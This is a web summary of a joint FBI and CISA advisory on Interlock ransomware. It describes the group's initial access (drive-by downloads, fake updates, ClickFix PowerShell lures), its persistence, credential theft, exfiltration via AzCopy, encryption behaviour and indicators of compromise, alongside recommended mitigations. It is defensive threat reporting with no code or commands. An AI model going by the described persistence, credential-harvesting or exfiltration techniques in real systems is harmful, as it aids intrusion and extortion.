FBI & CISA Advisory: Protecting Against Interlock Ransomware

The Federal Bureau of Investigation (FBI) in collaboration with U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information-Sharing and Analysis Center (MS-ISAC) have released a joint Cybersecurity Advisory on Interlock ransomware, which was first seen in 2024 and often targets Windows and Linux virtual machines.

The advisory outlines indicators of compromise and details the tactics, techniques, and procedures (TTPs) associated with Interlock ransomware, as uncovered in recent FBI investigations.

To reduce the risk of Interlock ransomware attacks, organizations are urged to take the following actions:

• Prevent initial access by using domain name system (DNS) filtering, deploying web access firewalls, and training employees to recognize social engineering tactics.
• Address known vulnerabilities by regularly updating and patching operating systems, applications, and firmware.
• Segment internal networks to limit lateral movement from infected devices to other parts of the organization.
• Strengthen identity and access management by enforcing organization-wide credential policies and enabling multifactor authentication wherever possible.

Download the complete Advisory HERE

Interlock ransomware first emerged in late September 2024, targeting a wide range of businesses and critical infrastructure across North America and Europe. According to the FBI, these attacks are opportunistic and financially motivated. Interlock ransomware operators have developed encryptors for both Windows and Linux environments and have primarily focused on encrypting virtual machines (VMs).

Notably, the group uses unconventional methods for initial access, such as drive-by downloads from compromised legitimate websites and a social engineering tactic called “ClickFix.” In the ClickFix approach, victims are tricked into running a malicious payload under the pretense of fixing a problem on their system.

Once inside a network, the actors carry out discovery, credential harvesting, and lateral movement to expand their access. They employ a double extortion model—encrypting systems after exfiltrating sensitive data to pressure victims into paying the ransom to both decrypt files and prevent public leaks.

The FBI has observed Interlock actors gaining initial access using:

• Drive-by downloads from compromised websites—a typical entry method for ransomware groups.
• Fake browser updates, previously posing as Google Chrome or Microsoft Edge, and more recently disguised as updates for well-known security tools.
• ClickFix social engineering, where users are prompted to run a malicious CAPTCHA, instructing them to paste and execute a Base64-encoded PowerShell script

This technique has also appeared in other malware campaigns like Lumma Stealer and DarkGate.

Once inside, Interlock actors deploy:

• A PowerShell-based Remote Access Trojan (RAT) that installs into the Windows Startup folder to maintain persistence.
• An alternative method using Windows Registry key modifications with a PowerShell script that adds a “Chrome Updater” run key.

For maintaining control and executing commands, the actors use:

• Cobalt Strike
• SystemBC
• Interlock RAT
• NodeSnake RAT (observed as of March 2025)

After gaining remote access, Interlock actors:

• Deploy credential stealers and keyloggers to harvest user data and login credentials.
• Use third-party tools such as Lumma Stealer and Berserk Stealer for credential harvesting and privilege escalation.
• Move laterally using Remote Desktop Protocol (RDP), AnyDesk, and PuTTY.
• Target domain administrator accounts, potentially using Kerberoasting attacks.

For data collection and exfiltration, actors utilize:

• Azure Storage Explorer to browse Microsoft Azure Storage.
• AzCopy to exfiltrate data to Azure blob storage.
• Additional file transfer tools like WinSCP for moving stolen data.

After exfiltrating data, the ransomware payload—usually a 64-bit executable named conhost.exe—is deployed to encrypt files.

Key details include:

• Use of AES and RSA encryption algorithms.
• Identification of a FreeBSD ELF encryptor, diverging from the more common Linux ESXi-targeting ransomware.
• On Linux, the payload uses a function called removeme to delete itself post-encryption.
• On Windows, a DLL (tmp41.wasd) is executed using rundll32.exe to remove the encryption binary

Encrypted files are appended with .interlock or .1nt3rlock extensions, and a ransom note titled !__README__!.txt is deployed via Group Policy Object (GPO).

The ransom note:

• Provides a unique victim ID.
• Directs victims to contact the attackers via a .onion site using the Tor browser.
• Does not contain an initial ransom amount or payment details—these are shared only after contact is made.
• Demands Bitcoin payments and threatens to leak stolen data if the ransom isn’t paid. The FBI has confirmed that Interlock actors have followed through on this threat.

There are open-source reports highlighting similarities between Interlock and Rhysida ransomware variants.

Download the complete Advisory HERE